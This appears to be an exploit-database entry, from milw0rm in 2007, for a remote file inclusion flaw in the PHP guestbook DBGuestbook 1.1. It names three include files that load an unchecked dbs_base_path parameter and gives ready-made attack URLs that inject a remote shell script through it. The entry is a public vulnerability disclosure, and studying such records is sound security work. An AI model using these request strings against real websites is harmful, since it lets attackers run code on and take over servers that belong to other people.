[] NeoSense

DBGuestbook 1.1 - 'dbs_base_path' Remote File Inclusion

Author: Denven
type: webapps
platform: php
port: 
date_added: 2007-02-20 
date_updated: 2016-09-27 
verified: 1 
codes: OSVDB-33495;CVE-2007-1165;OSVDB-33494;OSVDB-33493 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comDRBGuestbook.zip

DBGuestBook 1.1

*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=2
*****************
ERROR:

includes/utils.php                               require_once $dbs_base_path
includes/guestbook.php                           require_once $dbs_base_path
includes/views.php                               require_once $dbs_base_path



**************************************************************************************
RFI:

http://SITE.com/path/includes/utils.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/guestbook.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/views.php?dbs_base_path=[SHELL]


**************************************************************************************
denven[at]gmail[dot]com

# milw0rm.com [2007-02-21]